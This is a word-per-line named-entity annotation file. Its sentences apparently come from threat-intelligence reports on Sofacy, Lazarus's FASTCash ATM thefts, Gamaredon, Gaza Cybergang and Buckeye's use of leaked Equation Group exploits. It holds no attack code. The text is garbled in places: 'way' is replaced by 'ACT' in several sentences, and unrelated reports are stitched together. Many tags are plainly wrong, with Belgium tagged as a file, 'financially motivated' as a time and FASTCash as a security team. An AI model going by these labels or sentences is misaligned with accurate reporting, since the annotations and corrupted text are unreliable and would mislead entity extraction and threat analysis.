+also O
+behind O
+an O
+attack O
+on O
+the O
+World O
+Anti-Doping O
+Agency O
+(WADA) S-IDTY
+, O
+in O
+which O
+they O
+leaked O
+confidential O
+information O
+about O
+several O
+drug O
+tests O
+. O
+SPLM S-APT
+, O
+GAMEFISH S-APT
+, O
+and O
+Zebrocy S-APT
+delivery O
+all O
+maintain O
+their O
+own O
+clusters O
+, O
+but O
+frequently O
+overlap O
+later O
+. O
+Our O
+previous O
+post O
+on O
+Sofacy's S-APT
+2017 O
+activity O
+stepped O
+aACT O
+from O
+the O
+previously O
+covered O
+headline O
+buzz O
+presenting O
+their O
+association O
+with O
+previously O
+known O
+political O
+hacks O
+and O
+interest O
+in O
+Europe S-LOC
+and O
+the O
+US S-LOC
+, O
+and O
+examines O
+their O
+under-reported O
+ongoing O
+activity O
+in O
+middle B-LOC
+east E-LOC
+, O
+central B-LOC
+asia E-LOC
+, O
+and O
+now O
+a O
+shift O
+in O
+targeting O
+further O
+east O
+, O
+including O
+China S-LOC
+, O
+along O
+with O
+an O
+overlap O
+surprise O
+. O
+The O
+larger O
+, O
+300kb+ O
+SPLM S-APT
+backdoors O
+deployed O
+in O
+2016 B-TIME
+and I-TIME
+2017 E-TIME
+are O
+not O
+observed O
+any O
+longer O
+at O
+targets O
+in O
+2018 S-TIME
+. O
+A O
+previous O
+, O
+removed O
+, O
+report O
+from O
+another O
+vendor O
+claimed O
+non-specific O
+information O
+about O
+the O
+groups' S-APT
+interest O
+in O
+Chinese B-IDTY
+universities E-IDTY
+, O
+but O
+that O
+report O
+has O
+been O
+removed O
+– O
+most O
+likely O
+detections O
+were O
+related O
+to O
+students’ O
+and O
+researchers’ O
+scanning O
+known O
+collected O
+samples O
+and O
+any O
+incidents” O
+remain O
+unconfirmed O
+and O
+unknown O
+. O
+Either O
+ACT O
+, O
+the O
+group's S-APT
+consistent O
+activity O
+throughout O
+central B-LOC
+and I-LOC
+eastern I-LOC
+asia E-LOC
+seems O
+to O
+be O
+poorly O
+represented O
+in O
+the O
+public O
+discussion O
+. O
+The O
+actors O
+behind O
+this O
+campaign O
+we O
+call O
+LUCKY B-APT
+ELEPHANT E-APT
+use O
+doppelganger B-MAL
+webpages E-MAL
+to O
+mimic O
+legitimate O
+entities O
+such O
+as O
+foreign B-IDTY
+governments E-IDTY
+, O
+telecommunications S-IDTY
+, O
+and O
+military S-IDTY
+. O
+Currently O
+, O
+Sofacy O
+targets O
+large O
+air-defense S-ACT
+related O
+commercial O
+organizations O
+in O
+China S-LOC
+with O
+SPLM O
+, O
+and O
+moves O
+Zebrocy O
+focus O
+across O
+Armenia S-LOC
+, O
+Turkey S-LOC
+, O
+Kazahkstan S-LOC
+, O
+Tajikistan S-LOC
+, O
+Afghanistan S-LOC
+, O
+Mongolia S-LOC
+, O
+China S-LOC
+, O
+and O
+Japan S-LOC
+. O
+Either O
+ACT O
+, O
+Sofacy's S-APT
+consistent O
+activity O
+throughout O
+central B-LOC
+and I-LOC
+eastern I-LOC
+asia E-LOC
+seems O
+to O
+be O
+poorly O
+represented O
+in O
+the O
+public O
+discussion O
+. O
+According O
+to O
+this O
+new O
+alert O
+, O
+Hidden B-APT
+Cobra E-APT
+the O
+U.S. O
+government’s O
+code O
+name O
+for O
+Lazarus O
+has O
+been O
+conducting O
+FASTCash S-ACT
+attacks O
+stealing O
+money O
+from O
+Automated O
+Teller O
+Machines O
+(ATMs) O
+from O
+banks S-IDTY
+in O
+Asia S-LOC
+and O
+Africa S-LOC
+since O
+at O
+least O
+2016 S-TIME
+. O
+Lazarus S-APT
+is O
+a O
+very O
+active O
+attack O
+group O
+involved O
+in O
+both O
+cyber O
+crime O
+and O
+espionage O
+. O
+The O
+group O
+was O
+initially O
+known O
+for O
+its O
+espionage O
+operations O
+and O
+a O
+number O
+of O
+high-profile O
+disruptive O
+attacks O
+, O
+including O
+the O
+2014 B-ACT
+attack E-ACT
+on O
+Sony O
+Pictures O
+. O
+Following O
+US-CERTs O
+report O
+, O
+Symantec's O
+research O
+uncovered O
+the O
+key O
+component O
+used O
+in O
+Lazarus's S-APT
+recent O
+wave O
+of O
+financial S-IDTY
+attacks O
+. O
+More O
+recently O
+, O
+Lazarus S-APT
+has O
+also O
+become O
+involved O
+in O
+financially O
+motivated O
+attacks O
+, O
+including O
+an O
+US$81 O
+million O
+dollar O
+theft O
+from O
+the O
+Bangladesh B-IDTY
+Central I-IDTY
+Bank E-IDTY
+and O
+the O
+WannaCry S-MAL
+ransomware O
+. O
+Other O
+open O
+source O
+and O
+semi-legitimate O
+pen-testing O
+tools O
+like O
+nbtscan S-FILE
+and O
+powercat S-FILE
+are O
+being O
+used O
+for O
+mapping O
+available O
+resources O
+and O
+lateral O
+movement O
+as O
+well O
+. O
+To O
+make O
+the O
+fraudulent O
+withdrawals O
+, O
+Lazarus S-APT
+first O
+breaches O
+targeted O
+banks' S-IDTY
+networks O
+and O
+compromises O
+the O
+switch O
+application O
+servers O
+handling O
+ATM O
+transactions O
+. O
+The O
+operation O
+, O
+known O
+as O
+FASTCash” O
+has O
+enabled O
+Lazarus S-APT
+to O
+fraudulently O
+empty O
+ATMs O
+of O
+cash O
+. O
+In O
+order O
+to O
+permit O
+their O
+fraudulent O
+withdrawals O
+from O
+ATMs O
+, O
+Lazarus S-APT
+inject O
+a O
+malicious O
+Advanced O
+Interactive O
+eXecutive O
+(AIX) S-MAL
+executable O
+into O
+a O
+running O
+, O
+legitimate O
+process O
+on O
+the O
+switch O
+application O
+server O
+of O
+a O
+financial O
+transaction O
+network O
+, O
+in O
+this O
+case O
+a O
+network O
+handling O
+ATM O
+transactions O
+. O
+It O
+was O
+previously O
+believed O
+that O
+the O
+attackers S-APT
+used O
+scripts S-MAL
+to O
+manipulate O
+legitimate O
+software O
+on O
+the O
+server O
+into O
+enabling O
+the O
+fraudulent O
+activity O
+. O
+In O
+recent B-TIME
+years E-TIME
+, O
+Lazarus S-APT
+has O
+also O
+become O
+involved O
+in O
+financially S-IDTY
+motivated O
+attacks O
+. O
+This O
+malware S-MAL
+in O
+turn O
+intercepts O
+fraudulent O
+Lazarus S-APT
+cash O
+withdrawal O
+requests O
+and O
+sends O
+fake O
+approval O
+responses O
+, O
+allowing O
+the O
+attackers O
+to O
+steal O
+cash O
+from O
+ATMs O
+. O
+Lazarus S-APT
+was O
+linked O
+to O
+the O
+$81 O
+million O
+theft O
+from O
+the O
+Bangladesh B-IDTY
+central I-IDTY
+bank E-IDTY
+in O
+2016 S-TIME
+, O
+along O
+with O
+a O
+number O
+of O
+other O
+bank O
+heists O
+. O
+Lazarus S-APT
+was O
+also O
+linked O
+to O
+the O
+WannaCry B-ACT
+ransomware E-ACT
+outbreak O
+in O
+May O
+2017 O
+. O
+WannaCry S-ACT
+incorporated O
+the O
+leaked O
+EternalBlue S-VULNAME
+exploit S-VULNAME
+that O
+used O
+two O
+known O
+vulnerabilities O
+in O
+Windows S-OS
+CVE-2017-0144 S-VULID
+and O
+CVE-2017-0145 S-VULID
+to O
+turn O
+the O
+ransomware O
+into O
+a O
+worm O
+, O
+capable O
+of O
+spreading O
+itself O
+to O
+any O
+unpatched O
+computers O
+on O
+the O
+victim's O
+network O
+and O
+also O
+to O
+other O
+vulnerable O
+computers O
+connected O
+to O
+the O
+internet O
+. O
+Lazarus S-APT
+was O
+initially O
+known O
+for O
+its O
+involvement O
+in O
+espionage O
+operations O
+and O
+a O
+number O
+of O
+high-profile O
+disruptive O
+attacks O
+, O
+including O
+the O
+2014 S-TIME
+attack O
+on O
+Sony O
+Pictures O
+that O
+saw O
+large O
+amounts O
+of O
+information O
+being O
+stolen O
+and O
+computers O
+wiped O
+by O
+malware O
+. O
+In O
+short O
+, O
+Lazarus S-APT
+continues O
+to O
+pose O
+a O
+serious O
+threat O
+to O
+the O
+financial B-IDTY
+sector E-IDTY
+and O
+organizations O
+should O
+take O
+all O
+necessary O
+steps O
+to O
+ensure O
+that O
+their O
+payment O
+systems O
+are O
+fully O
+up O
+to O
+date O
+and O
+secured O
+. O
+As O
+with O
+the O
+2016 S-TIME
+series O
+of O
+virtual O
+bank O
+heists O
+, O
+including O
+the O
+Bangladesh O
+Bank O
+heist O
+, O
+FASTCash S-SECTEAM
+illustrates O
+that O
+Lazarus S-APT
+possesses O
+an O
+in-depth O
+knowledge O
+of O
+banking O
+systems O
+and O
+transaction O
+processing O
+protocols O
+and O
+has O
+the O
+expertise O
+to O
+leverage O
+that O
+knowledge O
+in O
+order O
+to O
+steal O
+large O
+sums O
+from O
+vulnerable O
+banks O
+. O
+The O
+attack S-APT
+, O
+which O
+starts O
+with O
+a O
+malicious O
+attachment O
+disguised O
+as O
+a O
+top O
+secret O
+US O
+document O
+, O
+weaponizes O
+TeamViewer S-MAL
+, O
+the O
+popular O
+remote O
+access O
+and O
+desktop O
+sharing O
+software O
+, O
+to O
+gain O
+full O
+control O
+of O
+the O
+infected O
+computer O
+. O
+As O
+described O
+in O
+the O
+infection O
+flow O
+, O
+one O
+of O
+the O
+first O
+uses O
+of O
+the O
+AutoHotKey B-FILE
+scripts E-FILE
+is O
+to O
+upload O
+a O
+screenshot O
+from O
+the O
+compromised O
+PC O
+. O
+It O
+is O
+hard O
+to O
+tell O
+if O
+there O
+are O
+geopolitical O
+motives O
+behind O
+this O
+campaign O
+by O
+looking O
+solely O
+at O
+the O
+list O
+of O
+countries O
+it O
+was O
+targeting O
+, O
+since O
+it O
+was O
+not O
+after O
+a O
+specific O
+region O
+and O
+the O
+victims O
+came O
+from O
+different B-LOC
+places E-LOC
+in O
+the O
+world O
+. O
+The O
+initial O
+infection O
+vector O
+used O
+by O
+the O
+threat O
+actor O
+also O
+changed O
+over O
+time O
+, O
+during O
+2018 S-TIME
+we O
+have O
+seen O
+multiple O
+uses O
+of O
+self-extracting O
+archives S-MAL
+instead O
+of O
+malicious O
+documents O
+with O
+AutoHotKey S-APT
+, O
+which O
+displayed O
+a O
+decoy B-MAL
+image E-MAL
+to O
+the O
+user O
+. O
+The O
+recent O
+wave O
+of O
+FASTCash B-ACT
+attacks E-ACT
+demonstrates O
+that O
+financially B-TIME
+motivated E-TIME
+attacks O
+are O
+not O
+simply O
+a O
+passing O
+interest O
+for O
+the O
+Lazarus B-APT
+group E-APT
+and O
+can O
+now O
+be O
+considered O
+one O
+of O
+its O
+core O
+activities O
+. O
+Although O
+both O
+examples O
+of O
+the O
+different O
+delivery O
+methods O
+described O
+above O
+show O
+an O
+exclusive O
+targeting O
+of O
+Russian S-LOC
+speakers O
+, O
+the O
+recurring O
+financial O
+and O
+political O
+themes O
+that O
+they O
+use O
+highlight O
+the O
+attacker's S-APT
+interest O
+in O
+the O
+financial S-IDTY
+world O
+once O
+more O
+. O
+Throughout O
+our O
+investigation O
+, O
+we O
+have O
+found O
+evidence O
+that O
+shows O
+operational O
+similarities O
+between O
+this O
+implant S-FILE
+and O
+Gamaredon S-APT
+Group O
+. O
+Gamaredon B-APT
+Group E-APT
+is O
+an O
+alleged O
+Russian S-LOC
+threat O
+group O
+. O
+Gamaredon B-APT
+Group E-APT
+has O
+been O
+active O
+since O
+at O
+least O
+2013 O
+, O
+and O
+has O
+targeted O
+individuals O
+likely O
+involved O
+with O
+the O
+Ukrainian B-IDTY
+government E-IDTY
+. O
+EvilGnome's S-APT
+functionalities O
+include O
+desktop B-MAL
+screenshots E-MAL
+, O
+file B-MAL
+stealing E-MAL
+, O
+allowing O
+capturing B-MAL
+audio I-MAL
+recording E-MAL
+from O
+the O
+user’s O
+microphone O
+and O
+the O
+ability O
+to O
+download O
+and O
+execute O
+further O
+modules O
+. O
+Gamaredon B-APT
+Group E-APT
+primarily O
+makes O
+use O
+of O
+Russian O
+hosting O
+providers O
+in O
+order O
+to O
+distribute O
+its O
+malware S-MAL
+. O
+Gamaredon B-APT
+Group's E-APT
+implants O
+are O
+characterized O
+by O
+the O
+employment O
+of O
+information B-MAL
+stealing I-MAL
+tools E-MAL
+— O
+among O
+them O
+being O
+screenshot O
+and O
+document O
+stealers O
+delivered O
+via O
+a O
+SFX O
+, O
+and O
+made O
+to O
+achieve O
+persistence O
+through O
+a O
+scheduled O
+task O
+. O
+Gamaredon B-APT
+Group E-APT
+infects O
+victims O
+using O
+malicious B-MAL
+attachments E-MAL
+, O
+delivered O
+via O
+spear B-ACT
+phishing E-ACT
+techniques O
+. O
+The O
+techniques O
+and O
+modules O
+employed O
+by O
+EvilGnome S-APT
+— O
+that O
+is O
+the O
+use O
+of O
+SFX S-MAL
+, O
+persistence O
+with O
+task O
+scheduler O
+and O
+the O
+deployment O
+of O
+information O
+stealing O
+tools—remind O
+us O
+of O
+Gamaredon O
+Group’s O
+Windows B-FILE
+tools E-FILE
+. O
+We O
+can O
+observe O
+that O
+the O
+sample S-FILE
+is O
+very O
+recent O
+, O
+created O
+on O
+Thursday O
+, O
+July B-TIME
+4 E-TIME
+. O
+As O
+can O
+be O
+observed O
+in O
+the O
+illustration O
+above O
+, O
+the O
+makeself B-FILE
+script E-FILE
+is O
+instructed O
+to O
+run O
+./setup.sh S-FILE
+after O
+unpacking O
+. O
+The O
+ShooterAudio B-FILE
+module E-FILE
+uses O
+PulseAudio S-MAL
+to O
+capture O
+audio O
+from O
+the O
+user's O
+microphone O
+. O
+makeself.sh S-FILE
+is O
+a O
+small O
+shell B-FILE
+script E-FILE
+that O
+generates O
+a O
+self-extractable O
+compressed O
+tar O
+archive O
+from O
+a O
+directory O
+. O
+During O
+our O
+2018 S-TIME
+monitoring O
+of O
+this O
+group O
+, O
+we O
+were O
+able O
+to O
+identify O
+different O
+techniques O
+utilized O
+by O
+very O
+similar O
+attackers O
+in O
+the O
+MENA B-LOC
+region E-LOC
+, O
+sometimes O
+on O
+the O
+same O
+target O
+. O
+Gaza B-APT
+Cybergang I-APT
+Group3 E-APT
+(highest O
+sophistication) O
+whose O
+activities O
+previously O
+went O
+by O
+the O
+name O
+Operation B-ACT
+Parliament E-ACT
+. O
+Gaza B-APT
+Cybergang E-APT
+has O
+been O
+seen O
+employing B-ACT
+phishing E-ACT
+, O
+with O
+several O
+chained O
+stages O
+to O
+evade O
+detection O
+and O
+extend O
+command O
+and O
+control O
+server O
+lifetimes O
+. O
+The O
+most O
+popular O
+targets O
+of O
+SneakyPastes S-APT
+are O
+embassies S-IDTY
+, O
+government B-IDTY
+entities E-IDTY
+, O
+education S-IDTY
+, O
+media B-IDTY
+outlets E-IDTY
+, O
+journalists O
+, O
+activists S-IDTY
+, O
+political O
+parties O
+or O
+personnel S-IDTY
+, O
+healthcare S-IDTY
+and O
+banking S-IDTY
+. O
+Through O
+our O
+continuous O
+monitoring O
+of O
+threats O
+during O
+2018 S-TIME
+, O
+we O
+observed O
+a O
+new O
+wave O
+of O
+attacks O
+by O
+Gaza B-APT
+Cybergang I-APT
+Group1 E-APT
+targeting O
+embassies S-IDTY
+and O
+political B-IDTY
+personnel E-IDTY
+. O
+Gaza B-APT
+Cybergang I-APT
+Group1 E-APT
+is O
+an O
+attack O
+group O
+with O
+limited O
+infrastructure O
+and O
+an O
+open-source O
+type O
+of O
+toolset O
+, O
+which O
+conducts O
+widespread O
+attacks O
+, O
+but O
+is O
+nevertheless O
+focused O
+on O
+Palestinian S-IDTY
+political O
+problems O
+. O
+In O
+this O
+campaign O
+, O
+Gaza B-APT
+Cybergang E-APT
+used O
+disposable B-ACT
+emails S-TOOL
+and O
+domains O
+as O
+the O
+phishing S-ACT
+platform O
+to O
+target O
+the O
+victims O
+. O
+The O
+RAT S-FILE
+, O
+however O
+, O
+had O
+a O
+multitude O
+of O
+functionalities O
+(as O
+listed O
+in O
+the O
+table O
+below) O
+such O
+as O
+to O
+download O
+and O
+execute O
+, O
+compress O
+, O
+encrypt O
+, O
+upload O
+, O
+search O
+directories O
+, O
+etc O
+. O
+We O
+expect O
+the O
+damage O
+caused O
+by O
+these O
+groups O
+to O
+intensify O
+and O
+the O
+attacks S-APT
+to O
+extend O
+into O
+other O
+regions O
+that O
+are O
+also O
+linked O
+to O
+the O
+complicated B-IDTY
+Palestinian I-IDTY
+situation E-IDTY
+. O
+Cylance S-SECTEAM
+determined O
+that O
+the O
+‘Ghost B-APT
+Dragon’ E-APT
+group O
+utilized O
+specifically O
+tailored O
+variants O
+of O
+Gh0st B-MAL
+RAT E-MAL
+, O
+which O
+the O
+group O
+modified O
+from O
+the O
+3.6 O
+version O
+of O
+the O
+source O
+code O
+released O
+in O
+2008 S-TIME
+. O
+The O
+standard O
+network O
+protocol O
+for O
+Gh0st B-APT
+RAT I-APT
+3.6 E-APT
+employs O
+zlib B-MAL
+compression E-MAL
+, O
+which O
+utilizes O
+‘Gh0st’ O
+as O
+a O
+static O
+five-byte O
+packet O
+flag O
+that O
+must O
+be O
+included O
+in O
+the O
+first O
+five O
+bytes O
+of O
+initial O
+transmission O
+from O
+the O
+victim O
+. O
+In O
+a O
+more O
+recent O
+version O
+of O
+the O
+modified O
+Gh0st B-FILE
+RAT E-FILE
+malware O
+, O
+Ghost B-APT
+Dragon E-APT
+implemented O
+dynamic O
+packet O
+flags O
+which O
+change O
+the O
+first O
+five O
+bytes O
+of O
+the O
+header O
+in O
+every O
+login O
+request O
+with O
+the O
+controller O
+. O
+SPEAR O
+has O
+observed O
+numerous O
+different O
+XOR O
+keys O
+utilized O
+by O
+Ghost B-APT
+Dragon E-APT
+. O
+exploit S-VULNAME
+and O
+tools O
+continued O
+to O
+be O
+used O
+after O
+Buckeye's S-APT
+apparent O
+disappearance O
+in O
+2017 S-TIME
+. O
+The O
+Buckeye S-APT
+attack O
+group O
+was O
+using O
+Equation B-MAL
+Group I-MAL
+tools E-MAL
+to O
+gain O
+persistent O
+access O
+to O
+target O
+organizations O
+at O
+least O
+a O
+year O
+prior O
+to O
+the O
+Shadow B-ACT
+Brokers I-ACT
+leak E-ACT
+. O
+Buckeye's S-APT
+use O
+of O
+Equation O
+Group O
+tools O
+also O
+involved O
+the O
+exploit S-VULNAME
+of O
+a O
+previously O
+unknown O
+Windows S-OS
+zero-day S-ACT
+vulnerability O
+. O
+While O
+Buckeye S-APT
+appeared O
+to O
+cease O
+operations O
+in O
+mid-2017 O
+, O
+the O
+Equation B-MAL
+Group I-MAL
+tools E-MAL
+it O
+used O
+continued O
+to O
+be O
+used O
+in O
+attacks O
+until O
+late S-TIME
+2018 S-TIME
+. O
+The O
+2017 B-ACT
+leak E-ACT
+of O
+Equation O
+Group O
+tools O
+by O
+a O
+mysterious B-APT
+group E-APT
+calling O
+itself O
+the O
+Shadow O
+Brokers O
+was O
+one O
+of O
+the O
+most O
+significant O
+cyber O
+security O
+stories O
+in O
+recent O
+years. O
+However O
+, O
+Symantec S-SECTEAM
+has O
+now O
+found O
+evidence O
+that O
+the O
+Buckeye S-APT
+Cyber B-ACT
+Espionage E-ACT
+group O
+(aka B-APT
+APT3 E-APT
+, O
+Gothic B-APT
+Panda E-APT
+) O
+began O
+using O
+Equation B-MAL
+Group I-MAL
+tools E-MAL
+in O
+attacks O
+at O
+least O
+a O
+year O
+prior O
+to O
+the O
+Shadow O
+Brokers O
+leak O
+. O
+Equation S-APT
+is O
+regarded O
+as O
+one O
+of O
+the O
+most O
+technically O
+adept O
+espionage O
+groups O
+and O
+the O
+release O
+of O
+a O
+trove S-MAL
+of O
+its O
+tools O
+had O
+a O
+major O
+impact O
+, O
+with O
+many O
+attackers O
+rushing O
+to O
+deploy O
+the O
+malware O
+and O
+exploits O
+disclosed O
+. O
+DoublePulsar S-APT
+was O
+delivered O
+to O
+victims O
+using O
+a O
+custom O
+exploit B-MAL
+tool E-MAL
+(Trojan.Bemstour) O
+that O
+was O
+specifically O
+designed O
+to O
+install O
+DoublePulsar O
+. O
+One O
+vulnerability O
+is O
+a O
+Windows S-OS
+zero-day S-VULNAME
+vulnerability O
+(CVE-2019-0703) O
+discovered O
+by O
+Symantec S-SECTEAM
+. O
+Bemstour S-APT
+exploits O
+two O
+Windows S-OS
+vulnerabilities S-VULNAME
+in O
+order O
+to O
+achieve O
+remote O
+kernel O
+code O
+execution O
+on O
+targeted O
+computers O
+. O
+
+The O
+second O
+Windows S-OS
+vulnerability O
+( O
+CVE-2017-0143 S-VULID
+) O
+was O
+patched O
+in O
+March B-TIME
+2017 E-TIME
+after O
+it O
+was O
+discovered O
+to O
+have O
+been O
+used O
+by O
+two O
+exploit S-VULNAME
+tools O
+EternalRomance S-VULNAME
+and O
+EternalSynergy S-VULNAME
+that O
+were O
+also O
+released O
+as O
+part O
+of O
+the O
+Shadow B-APT
+Brokers E-APT
+leak O
+. O
+
+It O
+was O
+reported O
+by O
+Symantec S-SECTEAM
+to O
+Microsoft S-IDTY
+in O
+September B-TIME
+2018 E-TIME
+and O
+was O
+patched O
+on O
+March O
+12 O
+, O
+2019 O
+. O
+How O
+Buckeye S-APT
+obtained O
+Equation B-MAL
+Group I-MAL
+tools E-MAL
+at O
+least O
+a O
+year O
+prior O
+to O
+the O
+Shadow O
+Brokers O
+leak O
+remains O
+unknown O
+. O
+
+The O
+Buckeye S-APT
+attack O
+group O
+had O
+been O
+active O
+since O
+at O
+least O
+2009 S-TIME
+, O
+when O
+it O
+began O
+mounting O
+a O
+string O
+of O
+espionage B-ACT
+attacks E-ACT
+, O
+mainly O
+against O
+organizations O
+based O
+in O
+the B-LOC
+U.S E-LOC
+. O
+
+These O
+include O
+CVE-2010-3962 S-VULID
+as O
+part O
+of O
+an O
+attack B-ACT
+campaign E-ACT
+in O
+2010 S-TIME
+and O
+CVE-2014-1776 S-VULID
+in O
+2014 S-TIME
+. O
+Beginning O
+in O
+August B-TIME
+2016 E-TIME
+, O
+a O
+group O
+calling O
+itself O
+the O
+Shadow B-APT
+Brokers E-APT
+began O
+releasing O
+tools O
+it O
+claimed O
+to O
+have O
+originated O
+from O
+the O
+Equation S-APT
+Group O
+. O
+Over O
+the O
+coming O
+months O
+, O
+it O
+progressively O
+released O
+more O
+tools O
+, O
+until O
+April O
+2017 O
+, O
+when O
+it O
+released O
+a O
+final O
+, O
+large O
+cache O
+of O
+tools O
+, O
+including O
+the O
+DoublePulsar B-MAL
+backdoor E-MAL
+, O
+the O
+FuzzBunch S-MAL
+framework S-MAL
+, O
+and O
+the O
+EternalBlue S-MAL
+, O
+EternalSynergy S-MAL
+, O
+and O
+EternalRomance S-MAL
+exploit S-MAL
+tools S-MAL
+. O
+However O
+, O
+Buckeye S-APT
+had O
+already O
+been O
+using O
+some O
+of O
+these O
+leaked B-MAL
+tools E-MAL
+at O
+least O
+a O
+year O
+beforehand O
+. O
+The O
+earliest O
+known O
+use O
+of O
+Equation B-MAL
+Group I-MAL
+tools E-MAL
+by O
+Buckeye S-APT
+is O
+March B-TIME
+31 E-TIME
+, O
+2016 S-TIME
+, O
+during O
+an O
+attack O
+on O
+a O
+target O
+in O
+Hong B-LOC
+Kong E-LOC
+. O
+Beginning O
+in O
+March B-TIME
+2016 E-TIME
+, O
+Buckeye S-APT
+began O
+using O
+a O
+variant O
+of O
+DoublePulsar O
+(Backdoor.Doublepulsar) O
+, O
+a O
+backdoor O
+that O
+was O
+subsequently O
+released O
+by O
+the O
+Shadow B-APT
+Brokers E-APT
+in O
+2017 S-TIME
+. O
+However O
+, O
+while O
+activity O
+involving O
+known O
+Buckeye S-APT
+tools O
+ceased O
+in O
+mid-2017 O
+, O
+the O
+Bemstour B-MAL
+exploit I-MAL
+tool E-MAL
+and O
+the O
+DoublePulsar S-MAL
+variant O
+used O
+by O
+Buckeye O
+continued O
+to O
+be O
+used O
+until O
+at O
+least O
+September B-TIME
+2018 E-TIME
+in O
+conjunction O
+with O
+different O
+malware O
+. O
+During O
+this O
+attack O
+, O
+the O
+Bemstour O
+exploit S-VULNAME
+tool O
+was O
+delivered O
+to O
+victims O
+via O
+known O
+Buckeye S-MAL
+malware S-MAL
+(Backdoor.Pirpi) O
+. O
+One O
+hour O
+later O
+, O
+Bemstour S-FILE
+was O
+used O
+against O
+an O
+educational O
+institution O
+in O
+Belgium S-FILE
+. O
+Bemstour S-FILE
+is O
+specifically O
+designed O
+to O
+deliver O
+a O
+variant O
+of O
+the O
+DoublePulsar B-MAL
+backdoor E-MAL
+. O
+DoublePulsar S-FILE
+is O
+then O
+used O
+to O
+inject O
+a O
+secondary O
+payload O
+, O
+which O
+runs O
+in O
+memory O
+only O
+. O
+A O
+significantly O
+improved O
+variant O
+of O
+the O
+Bemstour S-FILE
+exploit S-VULNAME
+tool O
+was O
+rolled O
+out O
+in O
+September B-TIME
+2016 E-TIME
+, O
+when O
+it O
+was O
+used O
+in O
+an O
+attack O
+against O
+an O
+educational O
+institution O
+in O
+Hong B-LOC
+Kong E-LOC
+. O
+When O
+used O
+against O
+32-bit O
+targets O
+, O
+Bemstour S-MAL
+still O
+delivered O
+the O
+same O
+DoublePulsar B-MAL
+backdoor E-MAL
+. O
+Bemstour S-FILE
+was O
+used O
+again O
+in O
+June O
+2017 O
+in O
+an O
+attack O
+against O
+an O
+organization O
+in O
+Luxembourg S-LOC
+. O
+Between O
+June O
+and O
+September O
+2017 O
+, O
+Bemstour S-FILE
+was O
+also O
+used O
+against O
+targets O
+in O
+the O
+Philippines S-LOC
+and O
+Vietnam S-LOC
+. O
+Development O
+of O
+Bemstour S-FILE
+has O
+continued O
+into O
+2019 S-TIME
+. O
+Unlike O
+earlier O
+attacks O
+when O
+Bemstour S-FILE
+was O
+delivered O
+using O
+Buckeye's O
+Pirpi S-FILE
+backdoor S-FILE
+, O
+in O
+this O
+attack O
+Bemstour O
+was O
+delivered O
+to O
+the O
+victim O
+by O
+a O
+different B-MAL
+backdoor E-MAL
+Trojan S-MAL
+(Backdoor.Filensfer) O
+. O
+The O
+most O
+recent O
+sample O
+of O
+Bemstour S-FILE
+seen O
+by O
+Symantec S-SECTEAM
+appears O
+to O
+have O
+been O
+compiled O
+on O
+March B-TIME
+23 E-TIME
+, O
+2019 O
+, O
+eleven O
+days O
+after O
+the O
+zero-day S-VULNAME
+vulnerability O
+was O
+patched O
+by O
+Microsoft S-IDTY
+. O
+Filensfer S-FILE
+is O
+a O
+family O
+of O
+malware O
+that O
+has O
+been O
+used O
+in O
+targeted O
+attacks O
+since O
+at O
+least O
+2013 S-TIME
+. O
+The O
+zero-day S-VULNAME
+vulnerability O
+found O
+and O
+reported O
+by O
+Symantec S-SECTEAM
+(CVE-2019-0703) S-VULID
+occurs O
+due O
+to O
+the O
+ACT O
+the O
+Windows S-OS
+SMB O
+Server O
+handles O
+certain O
+requests O
+. O
+While O
+Symantec S-SECTEAM
+has O
+never O
+observed O
+the O
+use O
+of O
+Filensfer S-FILE
+alongside O
+any O
+known O
+Buckeye O
+tools O
+, O
+information O
+shared O
+privately O
+by O
+another O
+vendor O
+included O
+evidence O
+of O
+Filensfer O
+being O
+used O
+in O
+conjunction O
+with O
+known O
+Buckeye B-FILE
+malware E-FILE
+(Backdoor.Pirpi) S-MAL
+. O
+CVE-2017-0143 S-VULID
+was O
+also O
+used O
+by O
+two O
+other O
+exploit S-VULNAME
+tools—EternalRomance S-FILE
+and O
+EternalSynergy—that S-FILE
+were O
+released O
+as O
+part O
+of O
+the O
+Shadow O
+Brokers O
+leak O
+in O
+April B-TIME
+2017 E-TIME
+. O
+Buckeye's O
+exploit S-VULNAME
+tool O
+, O
+EternalRomance S-FILE
+, O
+as O
+well O
+as O
+EternalSynergy S-FILE
+, O
+can O
+exploit S-VULNAME
+the O
+CVE-2017-0143 S-FILE
+message O
+type O
+confusion O
+vulnerability O
+to O
+perform O
+memory O
+corruption O
+on O
+unpatched O
+victim O
+computers O
+. O
+In O
+the O
+case O
+of O
+the O
+Buckeye B-MAL
+exploit I-MAL
+tool E-MAL
+, O
+the O
+attackers O
+exploited O
+their O
+own O
+zero-day S-VULNAME
+vulnerability O
+(CVE-2019-0703) O
+. O
+It O
+is O
+noteworthy O
+that O
+the O
+attackers S-APT
+never O
+used O
+the O
+FuzzBunch B-MAL
+framework E-MAL
+in O
+its O
+attacks O
+. O
+FuzzBunch S-MAL
+is O
+a O
+framework O
+designed O
+to O
+manage O
+DoublePulsar O
+and O
+other O
+Equation O
+Group O
+tools O
+and O
+was O
+leaked O
+by O
+the O
+Shadow B-APT
+Brokers E-APT
+in O
+2017 O
+. O
+There O
+are O
+multiple O
+possibilities O
+as O
+to O
+how O
+Buckeye S-APT
+obtained O
+Equation B-APT
+Group E-APT
+tools O
+before O
+the O
+Shadow O
+Brokers O
+leak O
+. O
+However O
+, O
+aside O
+from O
+the O
+continued O
+use O
+of O
+the O
+tools O
+, O
+Symantec S-SECTEAM
+has O
+found O
+no O
+other O
+evidence O
+suggesting O
+Buckeye S-APT
+has O
+retooled O
+. O
+this O
+RTF S-TOOL
+exploits O
+again O
+the O
+CVE-2017-1882 S-VULID
+on O
+eqnedt32.exe S-FILE
+. O
+And O
+the O
+dropper S-FILE
+execute O
+the O
+iassvcs.exe S-FILE
+to O
+make O
+a O
+side O
+loading O
+and O
+make O
+the O
+persistence O
+. O
+This O
+IP S-PROT
+is O
+very O
+interesting O
+because O
+it O
+connects O
+with O
+tele.zyns.com O
+and O
+old O
+infrastructures O
+used O
+by O
+chinese B-APT
+APT E-APT
+or O
+DDOS O
+Chinese O
+team O
+against O
+the O
+ancient B-IDTY
+soviet I-IDTY
+republics E-IDTY
+. O
+Over O
+the O
+past O
+three O
+years O
+, O
+Filensfer S-FILE
+has O
+been O
+deployed O
+against O
+organizations O
+in O
+Luxembourg S-LOC
+, O
+Sweden S-LOC
+, O
+Italy S-LOC
+, O
+the B-LOC
+UK E-LOC
+, O
+and O
+the B-LOC
+U.S E-LOC
+. O
+All O
+zero-day S-VULNAME
+exploits O
+known O
+, O
+or O
+suspected O
+, O
+to O
+have O
+been O
+used O
+by O
+this O
